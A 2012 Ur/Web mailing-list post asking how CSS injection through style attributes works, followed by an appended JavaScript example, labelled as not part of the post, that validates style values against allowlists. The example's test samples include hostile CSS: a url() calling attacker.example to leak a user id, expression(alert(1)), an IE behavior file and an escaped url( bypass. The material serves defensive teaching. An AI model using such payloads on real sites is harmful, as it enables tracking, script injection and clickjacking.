[Ur] Supporting 'style' attribute securely

Marc Weber marco-oweber at gmx.de
Sun Apr 15 13:36:07 EDT 2012


So what are people looking for?
For a CSS parser built into the urweb compiler which recognizes valid
links and checks them against a valid list of links which may be used
for CSS ? Then injection attacks would be impossible because 
putting arbitrary CSS code from a database into style attributes would
be rejected because it can't be parsed at runtime?

Can one of you give some illustration of what such an injection
attack with style attributes would look like?
If it's only about protecting against putting arbitrary text from the db into
style=".." attributes, then we have to worry whether we can trust the
programmer, because he might add leaks in the urweb language which you
can't prevent, such as fun page_output_db () = dump_whole_db. Thus
nobody is going to protect against mistakes made by programmers. To some
degree you have to trust what they are doing.

Whatever you do, I'd like to remind you of the usability of SASS-like
dialects for writing styles.

Oh, last but not least: URLs in styles (with hex-something decoding) are
used to speed up the loading of pages as well, because no additional small
icons have to be fetched, adding yet another round trip.

Marc Weber
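The injection Marc asks about, beside a validator of the kind he sketches (parse the style value, accept only known properties, check every url() against an allowlist), as an added example that is not part of the post and not Ur/Web code. The property allowlist, the URL prefixes and the sample style strings are illustrative assumptions.

```javascript
// Added example, not code from the post or from Ur/Web: an allowlist-based
// validator for a style="" value taken from a database. It parses the
// declarations, keeps only known properties with simple values, and checks
// every url() against a list of permitted resources. All allowlists and
// sample inputs below are illustrative assumptions.

// Properties a templating layer might let untrusted data set (assumed).
const ALLOWED_PROPERTIES = new Set([
  "color", "background-color", "background-image", "font-size",
  "font-weight", "text-align", "margin", "padding", "border", "width", "height",
]);
// Only these may carry a url() value.
const URL_PROPERTIES = new Set(["background-image"]);
// Assumed allowlist: icons the application serves itself, plus inline
// data: images (the "no extra round trip" case from the post).
const ALLOWED_URL_PREFIXES = ["/static/icons/", "data:image/png;base64,"];

// Keywords, lengths, percentages, hex colours and separators; no parens,
// quotes, slashes or braces, so expression(...) and "}" never pass.
const SIMPLE_VALUE = /^[A-Za-z0-9#%.,\s-]+$/;
// A single url() token, optionally quoted, with no whitespace, quotes or
// parens inside the address.
const URL_TOKEN = /^url\(\s*(['"]?)([^'"()\s]*)\1\s*\)$/i;

// Split on ';' outside quotes and parentheses, so a data:image/png;base64,...
// address stays in one declaration. Returns null when unbalanced.
function splitDeclarations(style) {
  const parts = [];
  let cur = "", depth = 0, quote = null;
  for (const ch of style) {
    if (quote) {
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    } else if (ch === "(") {
      depth++;
    } else if (ch === ")") {
      if (depth === 0) return null;
      depth--;
    } else if (ch === ";" && depth === 0) {
      parts.push(cur);
      cur = "";
      continue;
    }
    cur += ch;
  }
  if (depth !== 0 || quote !== null) return null;
  parts.push(cur);
  return parts;
}

function urlAllowed(address) {
  return ALLOWED_URL_PREFIXES.some((p) => address.startsWith(p));
}

// Returns { ok, style, errors }: `style` is the re-serialised attribute value
// when every declaration passed, otherwise "" (fail closed).
function validateStyle(style) {
  const errors = [];
  const kept = [];
  if (style.length > 1024) errors.push("style attribute too long");
  // A CSS escape such as \75 rl( reads as url( to the browser but not to a
  // text check, so backslashes are rejected rather than decoded.
  if (style.includes("\\")) errors.push("backslash escape in style");
  const decls = errors.length ? null : splitDeclarations(style);
  if (decls === null) {
    if (!errors.length) errors.push("unbalanced quotes or parentheses");
    return { ok: false, style: "", errors };
  }
  for (const raw of decls) {
    const decl = raw.trim();
    if (decl === "") continue;
    const colon = decl.indexOf(":");
    if (colon < 0) { errors.push(`malformed declaration: ${decl}`); continue; }
    const prop = decl.slice(0, colon).trim().toLowerCase();
    const value = decl.slice(colon + 1).trim();
    if (!ALLOWED_PROPERTIES.has(prop)) { errors.push(`property not allowed: ${prop}`); continue; }
    const url = URL_TOKEN.exec(value);
    if (url) {
      if (!URL_PROPERTIES.has(prop)) { errors.push(`url() not allowed in ${prop}`); continue; }
      if (!urlAllowed(url[2])) { errors.push(`url not on allowlist: ${url[2]}`); continue; }
      kept.push(`${prop}: url("${url[2]}")`);
    } else if (SIMPLE_VALUE.test(value)) {
      kept.push(`${prop}: ${value}`);
    } else {
      errors.push(`value not allowed for ${prop}: ${value}`);
    }
  }
  const ok = errors.length === 0;
  return { ok, style: ok ? kept.join("; ") : "", errors };
}

// Constructed samples: two benign values and the usual injection shapes.
const SAMPLES = [
  "color: red; background-image: url(/static/icons/ok.png)",
  "background-image: url(data:image/png;base64,iVBORw0KGgo=)",
  "background-image: url(http://attacker.example/log?user=42)", // tracking / exfiltration
  "width: expression(alert(1))",                                 // script in old IE
  "behavior: url(/static/icons/evil.htc)",                       // IE behaviours
  "position: fixed; top: 0; left: 0",                            // clickjacking overlay
  "background-image: \\75 rl(http://attacker.example/)",         // escaped url(
];
for (const s of SAMPLES) {
  const r = validateStyle(s);
  console.log(r.ok ? "ACCEPT" : "REJECT", JSON.stringify(s), r.errors.join("; "));
}
```

The validator only decides what may go inside the attribute value; the value must still be attribute-escaped when it is written into the HTML, or a stray `"` closes the attribute regardless of what CSS it contains. Rejecting backslashes outright is deliberate: decoding CSS escapes correctly is harder than refusing them, and nothing on an allowlist of plain property values needs them.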
